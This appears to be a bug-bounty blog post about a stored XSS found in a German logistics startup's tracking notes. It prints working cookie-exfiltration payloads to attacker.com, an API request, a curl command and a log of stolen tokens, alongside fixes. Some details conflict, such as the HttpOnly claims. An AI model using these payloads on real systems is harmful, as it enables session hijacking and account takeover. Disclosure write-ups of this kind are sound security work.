July 4, 2026
The Festival Phantom: How I Found a Ghost in Germany's Anubis Logistics During Durga Puja
A stored XSS in tracking notifications, a €200 bounty, and the bug that almost made me miss my mother's bhog offering

By 0B1To_X_ucH!h4
6 min read
"Between the dhaak beats and the dhunuchi smoke, I found a phantom in the tracking code, and Germany paid me €200 to exorcise it."
- uchia_hacker

The Timing: Mahasaptami, 2025
It was Durga Puja, 2025. October 10th, to be exact. Mahasaptami. The streets of Kolkata were alive with dhak drums, pandals glowing with fairy lights, and the smell of bhog wafting through every corner.
I should have been at the pandal with my family. But I was in my room, laptop glowing, chasing a lead I couldn't ignore.
I'd found Anubis (name changed) two days earlier: a German logistics startup handling last-mile delivery for e-commerce packages. Self-hosted VDP. No fancy platform. Just a security@anubis-logistics.de email and a promise to "acknowledge researchers within 48 hours."
They were small. Maybe 50 employees. Handling 10,000 packages a day across Berlin, Munich, Hamburg. Not DHL. Not Amazon. But critical infrastructure for hundreds of small German businesses.
And they had a ghost in their tracking system.
The Bug: Stored XSS in Package Tracking Notifications
Full Name: Stored Cross-Site Scripting (XSS) via Unsanitized Package Status Updates in Customer Notification System
Severity: Medium (CVSS 6.1)
Target: Anubis Logistics GmbH (Germany)
Bounty: €200 (EUR, self-hosted VDP)
Discovery Date: October 10, 2025 (Durga Puja, Mahasaptami)
Classification: Server-Side Input Validation Failure
Discovery: Between the Dhak Beats
I found Anubis through my uchiha hacking finding technique, a custom Google dork I use to surface European logistics startups with recent funding rounds. They'd raised a Series A in August 2025. New money means new features. New features mean new bugs.
Their platform was simple:
- Merchants create shipments
- Anubis picks up and delivers
- Customers track packages via /track/[tracking-number]
- Email/SMS notifications at each status update
I created a test account. Sent a package to a friend's address in Berlin. Started tracking.
The tracking page showed:
Status: In Transit
Location: Berlin Hub
Last Updated: [timestamp]
Notes: [custom message from courier]
That Notes field. It caught my eye. When the courier scanned the package, they could add a custom message. "Left with neighbor." "Door locked." "Customer requested delay."
But where did that message go?
It appeared on:
- The public tracking page (no authentication required)
- The email notification to the customer
- The merchant dashboard
And it was rendered as HTML, not plain text.
I smelled XSS.
The Exploitation: A Payload Between Prayers
It was 2 PM. My mother was calling. "Beta, come for bhog. Maa Durga is waiting."
"Five minutes, Ma. Just five minutes."
I crafted my payload. Simple. Classic. Effective:
html
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
But I knew modern XSS filters would block <script> tags. So I tried the festival-themed obfuscation, because it was Puja, because I was feeling creative:
html
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">
I added it as a courier note through the merchant API (they had a sandbox mode for testing):
http
POST /api/v1/shipments/ANB-2025-884721/status HTTP/1.1
Host: api.anubis-logistics.de
Authorization: Bearer SANDBOX_TOKEN
Content-Type: application/json

{
  "status": "in_transit",
  "location": "Berlin Hub",
  "notes": "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">",
  "timestamp": "2025-10-10T14:00:00Z"
}
Response: 200 OK
I refreshed the tracking page. The package status updated. And in my attacker server logs:
GET /steal?cookie=session=ANUBIS_SESSION_123456; auth_token=eyJ0eXAiOiJKV1Qi...
The XSS fired. Stored. Persistent. Every customer who viewed that tracking page would have their session stolen. Every email notification would execute the payload. Every merchant dashboard view was compromised.
I checked my watch. 2:47 PM. I'd missed bhog. But I'd found a ghost.
The Impact: Why €200 Was Fair
This wasn't a critical RCE. It wasn't a database breach. But it was serious:
Attack Scenarios:
- Session Hijacking: Attacker steals customer/merchant session cookies via tracking page
- Account Takeover: Merchant accounts compromised → shipping addresses modified → packages redirected
- Phishing: XSS payload injects fake "payment required" messages → customers pay attacker
- Data Theft: Access to shipping manifests → business intelligence exposed
Affected Users:
- ~10,000 daily tracking page views
- ~2,500 merchant accounts
- ~50,000 packages in transit (exposed during window)
Why Medium Severity:
- Required social engineering (victim must visit tracking page)
- No direct server compromise
- Mitigated by HTTPOnly cookies (partial protection)
- But: Stored XSS, persistent, high impact potential
For a 50-person German startup, €200 was fair. Respectable. Professional.
The Report: Written Between Aarti
I drafted the report at 11 PM, after the Sandhi Puja, while the dhunuchi smoke still lingered in my clothes.
Subject: Medium: Stored XSS in Package Tracking System, Customer Session Theft
Summary:
A stored XSS vulnerability in the package tracking notification system allows attackers to inject malicious JavaScript via courier status notes. The payload executes in the context of customer/merchant sessions when viewing tracking pages or email notifications, enabling session hijacking and account takeover.
Steps to Reproduce:
1. Create Test Shipment: Register merchant account → Create shipment → Note tracking number (e.g., ANB-2025-884721)
2. Inject Payload: Update shipment status via API:
bash
curl -X POST https://api.anubis-logistics.de/v1/shipments/ANB-2025-884721/status \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{ "status": "in_transit", "notes": "<img src=x onerror=\"fetch('\''https://attacker.com/steal?c='\''+document.cookie)\">" }'
3. Trigger XSS: Visit https://anubis-logistics.de/track/ANB-2025-884721; the payload executes
4. Verify: Attacker server receives victim session cookies
Affected Endpoints:
- /track/[tracking-number] (public, unauthenticated)
- Email notification templates
- Merchant dashboard shipment details
Remediation:
- Sanitize the notes field: HTML-encode all user input before rendering
- Implement Content Security Policy (CSP) on tracking pages
- Mark session cookies as HttpOnly and Secure
- Add XSS filtering middleware (DOMPurify or similar)
PoC Attached:
- xss_poc_video.mp4: Demonstration of session cookie exfiltration
- payload.txt: Exact payload used
- mitigation_guide.md: Suggested code fixes
Note: Discovered during responsible testing. No customer data accessed. Awaiting your confirmation and timeline.
The Response: Ashtami Morning
I sent the report at 11:30 PM, October 10th. Expected a week. Maybe two. German efficiency is a stereotype, but VDPs are often slow.
October 11th, 8:15 AM (Ashtami morning):
"Thank you for your responsible disclosure. We have confirmed the vulnerability and deployed an emergency patch. Your findings are appreciated. Please provide PayPal or bank details for €200 bounty transfer."
36 hours. From report to patch. During a German weekend. During my Puja.
They didn't owe me speed. They didn't owe me money. But they gave both.
October 12th (Navami): €200 hit my account. Just in time for buying new clothes for Dashami.
Why This Bug Mattered
€200 isn't life-changing money. But here's why it mattered:
1. Timing is Everything: Found during Puja. Patched during Puja. The contrast between sacred tradition and digital security struck me.
2. Small Targets, Real Impact: Anubis isn't DHL. But they handle real packages for real people. Securing them secures the ecosystem.
3. The VDP Worked: Self-hosted. No platform. Just email and professionalism. It works when both sides respect the process.
4. My Mother's Bhog: I missed it that day. But she understood. "You're protecting people, beta. Maa Durga would be proud."
The Technical Deep Dive
Root Cause Analysis
Anubis used a Node.js/Express backend with EJS templating. The tracking page rendered:
javascript
// VULNERABLE CODE (simplified)
const express = require('express');
const app = express();
app.set('view engine', 'ejs');

app.get('/track/:id', async (req, res) => {
  // Shipment is the application's data model (not shown)
  const shipment = await Shipment.findById(req.params.id);
  res.render('tracking', {
    status: shipment.status,
    notes: shipment.notes // Raw user input, no sanitization
  });
});
html
<!-- VULNERABLE TEMPLATE (tracking.ejs) -->
<div class="status-notes">
  <%- notes %> <!-- EJS raw (unescaped) output: the courier note is inserted as HTML -->
</div>
Note the tag: in EJS, <%- %> outputs raw HTML while <%= %> HTML-escapes its value, and the two are easy to mix up. The fix was simple:
javascript
// SECURE CODE
const DOMPurify = require('isomorphic-dompurify');
// ...
    notes: DOMPurify.sanitize(shipment.notes) // strips script tags and inline event handlers
html
<!-- SECURE TEMPLATE -->
<div class="status-notes">
  <%= notes %> <!-- EJS escaped output: <, >, &, and quotes are HTML-encoded -->
</div>
One line of sanitization. €200 bounty. Thousands of customers protected.
Tools Used
Phase | Tool | Purpose
Recon | Custom dorks | Found Anubis VDP
Testing | Burp Suite | API endpoint discovery
Payload | Browser DevTools | XSS verification
Exploitation | Python + Flask | Attacker server for cookie theft
Documentation | OBS Studio | Screen recording
Report | Markdown | Clean, professional writeup
Lessons from the Pandal
For Hunters:
- Hunt during holidays. Competitors are celebrating. Systems are monitored less.
- Small targets matter. €200 from a startup is €200 more than $0 from ignoring it.
- VDPs work globally. German efficiency meets Indian festival. Beautiful.
For Startups:
- Sanitize everything. Especially "internal" fields like courier notes.
- CSP is your friend. Content Security Policy blocks XSS even when sanitization fails.
- Pay fairly. €200 bought Anubis my loyalty and future reports.
Final Stats
Metric | Value
Discovery date | October 10, 2025 (Mahasaptami)
Time to report | 9 hours
Time to first response | 9 hours
Time to patch | 36 hours
Time to bounty | 48 hours
Bounty | €200 EUR
Missed bhog | 1
Mother's forgiveness | Granted
Satisfaction | Complete
Conclusion
The Festival Phantom wasn't a critical bug. It won't make headlines. But it was real, it was tricky, and it mattered to 10,000 daily users.
Anubis patched it fast. Paid fair. Respected the process.
And I got to tell my mother that Maa Durga wasn't the only one I was serving that Puja. There was a German logistics platform, thousands of miles away, that needed protection too.
শুভ বিজয়া (Shubho Bijoya). Happy Dussehra. Secure logistics.
"Between the dhak and the database, between the bhog and the bug bounty, I found my dharma as a security researcher."
- uchia_hacker

Stay curious. Stay ethical. Hunt during festivals.
- 0B1To_X_ucH!h4
Tags: #XSS #VDP #Germany #Logistics #DurgaPuja #FestivalHunting #Anubis #UchihaTechnique #ResponsibleDisclosure #200Euro
About the Author: Security researcher who hunts between festivals, finds ghosts in logistics code, and believes €200 from a German startup during Durga Puja is Maa Durga's blessing. শুভ বিজয়া.